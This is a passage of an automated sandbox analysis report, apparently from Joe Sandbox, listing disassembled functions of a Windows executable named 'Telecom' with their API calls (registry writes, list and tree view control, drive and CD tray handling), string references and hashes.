SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004D0FA0

Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D

Part of subcall function 004A2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004A2BA5
Part of subcall function 004A2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004A2BD7

Strings

SELECTALL, xrefs: 004D0FB1
GETITEMCOUNT, xrefs: 004D0DB2, 004D0DD3
FINDITEM, xrefs: 004D10C3
GETTEXT, xrefs: 004D0E88, 004D0EA3
GETSELECTEDCOUNT, xrefs: 004D0F0C, 004D0F27
VIEWCHANGE, xrefs: 004D1111
SELECT, xrefs: 004D0FE4
SELECTCLEAR, xrefs: 004D0FC9
GETSUBITEMCOUNT, xrefs: 004D0E20, 004D0E3B
SELECTINVERT, xrefs: 004D101A
DESELECT, xrefs: 004D1038
GETSELECTED, xrefs: 004D107D
ISSELECTED, xrefs: 004D0F79

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: a58eb71afbd36457f979fcfd3260ff537eee0083781fd7bc987908e290e93b7c
Instruction ID: 60319ed73901e1e9d164597f15c80b62382cb5830281ffda5bb2aea8678edf9e
Opcode Fuzzy Hash: a58eb71afbd36457f979fcfd3260ff537eee0083781fd7bc987908e290e93b7c
Instruction Fuzzy Hash: 87E1DF312042419FC714DF25C56092AB7E2BF98318F14496FF8969B3A2DB38ED45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004CCE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CCF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,004DDCD0,00000000,?,00000000,?,?), ref: 004CCFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 004CD004
_wcslen.LIBCMT ref: 004CD054
_wcslen.LIBCMT ref: 004CD0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 004CD112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 004CD221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 004CD2AD
RegCloseKey.ADVAPI32(?), ref: 004CD2E1
RegCloseKey.ADVAPI32(00000000), ref: 004CD2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 004CD3C0

Strings

REG_EXPAND_SZ, xrefs: 004CD02D
REG_MULTI_SZ, xrefs: 004CD155
REG_DWORD, xrefs: 004CD264
REG_BINARY, xrefs: 004CD373
REG_SZ, xrefs: 004CD0A4
REG_QWORD, xrefs: 004CD323

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 165321d39071cd2715cc840e240aa1c6e99fa8b3439eee811047cb052463e8ef
Instruction ID: 2f48a179ddde94cc0286fa992095f5a53a094719d488c3019dc2fa019b705962
Opcode Fuzzy Hash: 165321d39071cd2715cc840e240aa1c6e99fa8b3439eee811047cb052463e8ef
Instruction Fuzzy Hash: D6122B356042019FD754DF15C881F2AB7E5EF88718F14849EF88A9B3A2DB39ED41CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004D13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004D1462
_wcslen.LIBCMT ref: 004D149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D14F0
_wcslen.LIBCMT ref: 004D1526
_wcslen.LIBCMT ref: 004D15A2
_wcslen.LIBCMT ref: 004D161D

Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D

Part of subcall function 004A3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004A3547

Strings

EXPAND, xrefs: 004D1694
UNCHECK, xrefs: 004D17DA
GETITEMCOUNT, xrefs: 004D16BA
EXISTS, xrefs: 004D1618, 004D1633
GETSELECTED, xrefs: 004D16EA
GETTEXT, xrefs: 004D1733
ISCHECKED, xrefs: 004D177D
CHECK, xrefs: 004D1521, 004D153C
SELECT, xrefs: 004D17AD
COLLAPSE, xrefs: 004D159D, 004D15B8
GETTOTALCOUNT, xrefs: 004D148E, 004D14B3

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 141395c95f38f38a84f22394bfb046c17dbea7f5a21e80e96e5133e9df5e1d2a
Instruction ID: 6626ae77e34998beae6501d97ebea957fc11b27a4c00f1aec03e6355ec57c335
Opcode Fuzzy Hash: 141395c95f38f38a84f22394bfb046c17dbea7f5a21e80e96e5133e9df5e1d2a
Instruction Fuzzy Hash: C4E18175604301AFC714EF25C46086AB7E2FF94314B14495FF8969B3A2DB38ED45CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004CD3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
_wcslen.LIBCMT ref: 004CD451
_wcslen.LIBCMT ref: 004CD4C8
_wcslen.LIBCMT ref: 004CD4FE
_wcslen.LIBCMT ref: 004CD559
_wcslen.LIBCMT ref: 004CD58F
_wcslen.LIBCMT ref: 004CD5DF

Strings

HKEY_USERS, xrefs: 004CD63F
HKCR, xrefs: 004CD589, 004CD58E
HKEY_CURRENT_CONFIG, xrefs: 004CD5D9, 004CD5DE
HKCU, xrefs: 004CD62E
HKEY_LOCAL_MACHINE, xrefs: 004CD4C2, 004CD4C7
HKU, xrefs: 004CD650
HKCC, xrefs: 004CD60C
HKLM, xrefs: 004CD4F8, 004CD4FD
HKEY_CURRENT_USER, xrefs: 004CD61D
HKEY_CLASSES_ROOT, xrefs: 004CD553, 004CD558

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: c492dbaf62284bc1c9cae79cb1e9eaa6139e4c602b11be4979efd242b14ec397
Instruction ID: 3a6244d3322542345fec60eb42d1ff6b2bb61503aa2c080eee273b90473ad104
Opcode Fuzzy Hash: c492dbaf62284bc1c9cae79cb1e9eaa6139e4c602b11be4979efd242b14ec397
Instruction Fuzzy Hash: FE71D536E0052A9BCB509E28CD40FBF37A1AF60758B22013FE85697394EA3DDD45C799

Uniqueness

Uniqueness Score: -1.00%

Function 004D8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004D8DB5
_wcslen.LIBCMT ref: 004D8DC9
_wcslen.LIBCMT ref: 004D8DEC
_wcslen.LIBCMT ref: 004D8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004D8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004D6691), ref: 004D8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004D8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004D8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004D8F5C
FreeLibrary.KERNEL32(?), ref: 004D8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004D8F78
DestroyIcon.USER32(?,?,?,?,?,004D6691), ref: 004D8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004D8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004D8FB0

Strings

.exe, xrefs: 004D8DE3
.dll, xrefs: 004D8E06
.icl, xrefs: 004D8DC3

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 94374bddc94a67e8bb8f56e67167fcce6e3358fa233588ca7a4b4603205993ff
Instruction ID: b203077c0dbcc6c1b54e415ae084b0ea99843e450f61ea241afec3c25352191d
Opcode Fuzzy Hash: 94374bddc94a67e8bb8f56e67167fcce6e3358fa233588ca7a4b4603205993ff
Instruction Fuzzy Hash: 2D61DE71900219BAEB14DF64CC45BBF77A8BF08B14F10421FF815D62D1EB78A990CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004B48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 004B493D
_wcslen.LIBCMT ref: 004B4948
_wcslen.LIBCMT ref: 004B499F
_wcslen.LIBCMT ref: 004B49DD
GetDriveTypeW.KERNEL32(?), ref: 004B4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4ACC

Strings

type cdaudio alias cd wait, xrefs: 004B4A46
set cd door , xrefs: 004B4A6D
open, xrefs: 004B4999, 004B499E
close, xrefs: 004B4943, 004B495D
wait, xrefs: 004B4A89
open , xrefs: 004B4A2A
close cd wait, xrefs: 004B4AB7
closed, xrefs: 004B494D, 004B4972, 004B498B, 004B49C3, 004B49DC

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 571c1c4181a63ab24d19de1204f4f2bd4e4f9c0ac85d541c521b5349cd2dbcd3
Instruction ID: 3134b3562dc40798f3f22d2b1f2c7ace8209a27da4ff5100059e867d4a9e920f
Opcode Fuzzy Hash: 571c1c4181a63ab24d19de1204f4f2bd4e4f9c0ac85d541c521b5349cd2dbcd3
Instruction Fuzzy Hash: FA71BF729082059FD700EF35C8409ABB7E4FF98758F10492EF89597292EB38ED45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004A6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 004A6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004A63A7
SetWindowTextW.USER32(?,?), ref: 004A63BE
GetDlgItem.USER32(?,000003EA), ref: 004A63D3
SetWindowTextW.USER32(00000000,?), ref: 004A63D9
GetDlgItem.USER32(?,000003E9), ref: 004A63E9
SetWindowTextW.USER32(00000000,?), ref: 004A63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004A6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004A642A
GetWindowRect.USER32(?,?), ref: 004A6433
_wcslen.LIBCMT ref: 004A649A
SetWindowTextW.USER32(?,?), ref: 004A64D6
GetDesktopWindow.USER32 ref: 004A64DC
GetWindowRect.USER32(00000000), ref: 004A64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004A653A
GetClientRect.USER32(?,?), ref: 004A6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 004A656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004A6596

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 0c220e6a13d0e10bc602ae7015bd621253696565f94e6d327addc5970b4fe8df
Instruction ID: 0b5dce2c09ec9e5fe2faf9a55c95969bf6cdb18568adfaddc6e89cbe428e3cd4
Opcode Fuzzy Hash: 0c220e6a13d0e10bc602ae7015bd621253696565f94e6d327addc5970b4fe8df
Instruction Fuzzy Hash: B871B231900705EFDB20DFA8CE45AAFBBF5FF18704F15052AE586A26A0C778E940CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004C086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 004C0884
LoadCursorW.USER32(00000000,00007F8A), ref: 004C088F
LoadCursorW.USER32(00000000,00007F00), ref: 004C089A
LoadCursorW.USER32(00000000,00007F03), ref: 004C08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 004C08B0
LoadCursorW.USER32(00000000,00007F01), ref: 004C08BB
LoadCursorW.USER32(00000000,00007F81), ref: 004C08C6
LoadCursorW.USER32(00000000,00007F88), ref: 004C08D1
LoadCursorW.USER32(00000000,00007F80), ref: 004C08DC
LoadCursorW.USER32(00000000,00007F86), ref: 004C08E7
LoadCursorW.USER32(00000000,00007F83), ref: 004C08F2
LoadCursorW.USER32(00000000,00007F85), ref: 004C08FD
LoadCursorW.USER32(00000000,00007F82), ref: 004C0908
LoadCursorW.USER32(00000000,00007F84), ref: 004C0913
LoadCursorW.USER32(00000000,00007F04), ref: 004C091E
LoadCursorW.USER32(00000000,00007F02), ref: 004C0929
GetCursorInfo.USER32(?), ref: 004C0939
GetLastError.KERNEL32 ref: 004C097B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: adebd0d3bc09dace1946d07f9e1690b6265b33fd6b6d307afc87806e95e95b17
Instruction ID: ba5f913894f6b6f1780564c74606c06e73b6e226f2336b5c6daf88bf7dfbdd9a
Opcode Fuzzy Hash: adebd0d3bc09dace1946d07f9e1690b6265b33fd6b6d307afc87806e95e95b17
Instruction Fuzzy Hash: 194154B0D08319AADB509FBA8C85D5EBFE8FF04754B50452AE11CE7281DA78D801CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00460436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00460436

Part of subcall function 0046045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0051170C,00000FA0,6162EDA1,?,?,?,?,00482733,000000FF), ref: 0046048C
Part of subcall function 0046045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00482733,000000FF), ref: 00460497
Part of subcall function 0046045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00482733,000000FF), ref: 004604A8
Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 004604BE
Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004604CC
Part of subcall function 0046045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004604DA
Part of subcall function 0046045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00460505
Part of subcall function 0046045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00460510

___scrt_fastfail.LIBCMT ref: 00460457

Part of subcall function 00460413: __onexit.LIBCMT ref: 00460419

Strings

InitializeConditionVariable, xrefs: 004604B8
kernel32.dll, xrefs: 004604A3
SleepConditionVariableCS, xrefs: 004604C4
WakeAllConditionVariable, xrefs: 004604D2
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00460492

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: a9015ec5249f4f67176b9c88f8f4c3208f8398764381985bfe0d659a209098f2
Instruction ID: 88d834bd7337cf74d2d5d0264273b74fc321d50519568dabea6bd2b9b31c1e14
Opcode Fuzzy Hash: a9015ec5249f4f67176b9c88f8f4c3208f8398764381985bfe0d659a209098f2
Instruction Fuzzy Hash: 0421F932A417157BD7216BA5AC06BAF3794EF05B65F10016BF901963C0FFB89C418A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004B4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,004DDCD0), ref: 004B4F6C
_wcslen.LIBCMT ref: 004B4F80
_wcslen.LIBCMT ref: 004B4FDE
_wcslen.LIBCMT ref: 004B5039
_wcslen.LIBCMT ref: 004B5084
_wcslen.LIBCMT ref: 004B50EC

Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D

GetDriveTypeW.KERNEL32(?,00507C10,00000061), ref: 004B5188

Strings

unknown, xrefs: 004B514D
all, xrefs: 004B4F76, 004B4F7B
fixed, xrefs: 004B507A, 004B507F
network, xrefs: 004B50E2, 004B50E7
ramdisk, xrefs: 004B5136
cdrom, xrefs: 004B4FD4, 004B4FD9
removable, xrefs: 004B502F, 004B5034

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 277dcded7872984ebe18420c9fefcc1f949ce3755f2a1ae9e5d1128eb2d5a31e
Instruction ID: 32b64ca5dadc4d66496d61987988e068a25c15dc3b7ea4cc1e6da7544dc472c9
Opcode Fuzzy Hash: 277dcded7872984ebe18420c9fefcc1f949ce3755f2a1ae9e5d1128eb2d5a31e
Instruction Fuzzy Hash: 94B1C331A087029FC714EF29C890BABF7E5BFA4714F50491EF49687391E738D845CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 004C4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004DDCD0), ref: 004C4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004C4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,004DDCD0), ref: 004C4B4F
FreeLibrary.KERNEL32(00000000,?,004DDCD0), ref: 004C4B9B
StringFromGUID2.OLE32(?,?,00000028,?,004DDCD0), ref: 004C4C05
SysFreeString.OLEAUT32(00000009), ref: 004C4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004C4D25
SysFreeString.OLEAUT32(?), ref: 004C4D4F

Strings

GetModuleHandleExW, xrefs: 004C4B24
kernel32.dll, xrefs: 004C4B13

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: 6474b7bcbdca1521ac7bedd405283d48a59f1f45c79568b1a86526579f3ba0de
Instruction ID: 4186ea7d208f03ac5e0c2871730e8e45fbbbf38b53b5d8608663ee614848f823
Opcode Fuzzy Hash: 6474b7bcbdca1521ac7bedd405283d48a59f1f45c79568b1a86526579f3ba0de
Instruction Fuzzy Hash: DF128975A00105AFDB54CF94C994EAABBB5FF85318F24809EF805AB261C735ED42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00441802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00441488,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 00441865

DestroyWindow.USER32(?), ref: 00441521
KillTimer.USER32(00000000,?,?,?,?,0044145A,00000000,?), ref: 004415BB
DestroyAcceleratorTable.USER32(00000000), ref: 004829B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 004829E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000,?), ref: 004829F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0044145A,00000000), ref: 00482A15
DeleteObject.GDI32(00000000), ref: 00482A27

Strings

<)Q, xrefs: 004415E0

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)Q
API String ID: 641708696-2316974959
Opcode ID: 5df1323954c53b6b998e640c6e1dce1c3077074493809c96cf54bc1dc8a95cb2
Instruction ID: 9043bf1802b7869f9584a15e9a3c2ed27429a3f79fe7b8701e2aae6787f417dd
Opcode Fuzzy Hash: 5df1323954c53b6b998e640c6e1dce1c3077074493809c96cf54bc1dc8a95cb2
